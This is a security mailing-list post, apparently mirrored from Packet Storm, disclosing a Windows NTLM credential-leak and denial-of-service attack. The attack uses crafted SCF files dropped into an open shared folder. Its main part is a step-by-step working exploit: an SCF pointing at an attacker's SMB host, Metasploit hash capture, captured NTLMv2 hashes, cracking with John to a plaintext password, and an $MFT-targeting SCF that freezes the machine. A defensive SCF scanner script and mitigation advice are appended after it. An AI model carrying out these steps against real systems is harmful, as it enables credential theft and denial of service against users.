
Windows NTLM Auth Hash Disclosure / Denial Of Service

25 Oct 2017 00:00:00 · Reported by Juan Diego · Type: packetstorm · Source: packetstormsecurity.com

Windows NTLM Auth Hash Disclosure & Denial Of Service. Abusing a shared folder configuration to freeze the machine and obtain user credentials via crafted SCF files. MSRC was notified and the case closed.

Code

Hello,

I want to share some information with the people on the list. On May 24, I found a problem with NTLM auth on Windows.

Under certain circumstances a shared folder on Windows can be abused remotely to obtain the user credentials and to freeze the machine.

This was already reported to MSRC on May 24, and was closed on October 18.

This attack makes use of SCF files, and a shared folder with a certain configuration.

- Create a folder anywhere on the system, for example on the Desktop
- Right click - Properties
- Sharing tab
- Network and Sharing Center
- Enable 'Turn off password protected sharing'

Now, you need a crafted SCF file to abuse this; the file looks like this:

```
root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop

root@sysadminjd:~#
```

We are going to upload this file to the newly shared folder. We'll use smbclient, but first we need a metasploit console running the capture/smb auxiliary module.

```
root@sysadminjd:~# msfconsole -q

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job

[*] Server started.
msf auxiliary(smb)
```

Now we can upload the file:

```
root@sysadminjd:~# smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:
OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> cd juan
smb: \juan\> cd Desktop\
smb: \juan\Desktop\> cd prueba2\
smb: \juan\Desktop\prueba2\> put test.scf
putting file test.scf as \juan\Desktop\prueba2\test.scf (88.9 kb/s)
(average 88.9 kb/s)
smb: \juan\Desktop\prueba2\> ls
  .                                   D        0  Mon Oct 23 12:27:15 2017
  ..                                  D        0  Mon Oct 23 12:27:15 2017
  .DS_Store                          AH     6148  Tue May 23 17:29:03 2017
  test.scf                            A       91  Mon Oct 23 12:27:15 2017

                6527487 blocks of size 4096. 4043523 blocks available
smb: \juan\Desktop\prueba2\>
root@sysadminjd:~#
```

Our metasploit console should look like this:

```
msf auxiliary(smb) >
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:47894338d99abe2f08e2c693618c7323
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e97b70559f29462e2ca221d31113b9ca
NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb8b228b739cc95a12d7e0d89d89e002
NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:4abb0803c4afd1509bfca3bbc566ad70
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5eeb82aab85e9663624aaf6500e4d8f8
NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000
```

I chopped this one to avoid sending too much to the list.

When we started the smb capture module, we passed the option

```
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
```

so our hashes are in /tmp/smbhash.txt.

Let's try with John:

```
root@sysadminjd:~# cd /tmp/
root@sysadminjd:/tmp# john smbhash.txt_netntlmv2
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s 585124C/s abc
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@sysadminjd:/tmp#
```

That's it; now we have the plain text password for the machine.

If we want to freeze the machine, we can attack via $MFT with an SCF file like this:

```
root@sysadminjd:~# cat mft.scf
[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#
```

Just upload it to the vulnerable folder, and the machine will freeze in a few minutes due to the $MFT NTFS issue.

According to MS, all Windows versions are affected; they released an advisory for this:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170014#ID0EGB

It's a partial patch, there is no real fix for this, and the regcode change proposed by MS is only for Windows 10 and Server 2016.

I have a better-explained post about this on my blog:

English: http://www.sysadminjd.com/adv170014-ntlm-sso-exploitation-guide/
Spanish: https://www.sysadminjd.com/adv170014-ntlm-sso-guia-de-explotacion/

Thanks for your time :)

Best Regards

Juan Diego
--------
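As an added defensive example (not code from the original post, from the author's blog or from Microsoft), the following Python script parses SCF files and flags the two IconFile patterns the post describes: a UNC path to a remote host, which makes Explorer fetch the icon over SMB and authenticate with NTLM as soon as the folder is browsed, and a path into $MFT. The three sample SCF bodies are constructed inline (two modelled on the post's files, one benign); the directory argument of scan_path is an assumption, to be pointed at the local path backing a share.

```python
import os
import re
from typing import Dict, List

# Constructed sample SCF contents, modelled on the two files shown in the post.
SCF_UNC = r"""[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
"""

SCF_MFT = r"""[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
"""

# A benign SCF (constructed): the icon comes from a local system DLL.
SCF_LOCAL = r"""[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,34
[Taskbar]
Command=ToggleDesktop
"""

# \\host\share\... or //host/share/...
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')
# A path component named $MFT, e.g. c:\$MFT\123
MFT_RE = re.compile(r'(^|[\\/])\$mft([\\/]|$)', re.IGNORECASE)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style parser: section and key names are lowercased,
    values keep their case but lose surrounding whitespace."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((';', '#')):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is not None and '=' in line:
            key, _, value = line.partition('=')
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scan_scf(text: str) -> List[dict]:
    """Return one finding per risky IconFile pattern (empty list if none)."""
    findings: List[dict] = []
    icon = parse_scf(text).get('shell', {}).get('iconfile')
    if not icon:
        return findings
    value = icon.strip('"')
    if UNC_RE.match(value):
        host = re.split(r'[\\/]+', value.lstrip('\\/'))[0]
        findings.append({
            'kind': 'remote_unc',
            'host': host,
            'value': value,
            'detail': 'Explorer fetches the icon over SMB and authenticates '
                      '(NTLM) to this host when the folder is browsed',
        })
    if MFT_RE.search(value):
        findings.append({
            'kind': 'mft_path',
            'value': value,
            'detail': 'icon path points into $MFT; the post reports this '
                      'freezes the machine',
        })
    return findings


def scan_path(root: str) -> Dict[str, List[dict]]:
    """Walk a directory tree (assumed: the local path behind a share) and
    report every .scf file that has findings."""
    report: Dict[str, List[dict]] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith('.scf'):
                continue
            full = os.path.join(dirpath, name)
            with open(full, 'r', encoding='utf-8', errors='replace') as fh:
                found = scan_scf(fh.read())
            if found:
                report[full] = found
    return report


if __name__ == '__main__':
    samples = (('test.scf', SCF_UNC), ('mft.scf', SCF_MFT), ('benign.scf', SCF_LOCAL))
    for label, sample in samples:
        for f in scan_scf(sample) or [{'kind': 'ok', 'detail': 'no risky IconFile'}]:
            print(f"{label}: {f['kind']} - {f['detail']}")
```

Running the script on a share's local path gives a quick inventory of planted SCF files; the `remote_unc` host is what you would expect to see as the destination of outbound SMB from the affected client. This only finds the artefact, it does not stop the authentication: the mitigation the post points to is the outbound NTLM restriction described in ADV170014, together with keeping password-protected sharing enabled so untrusted users cannot write to the share in the first place.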
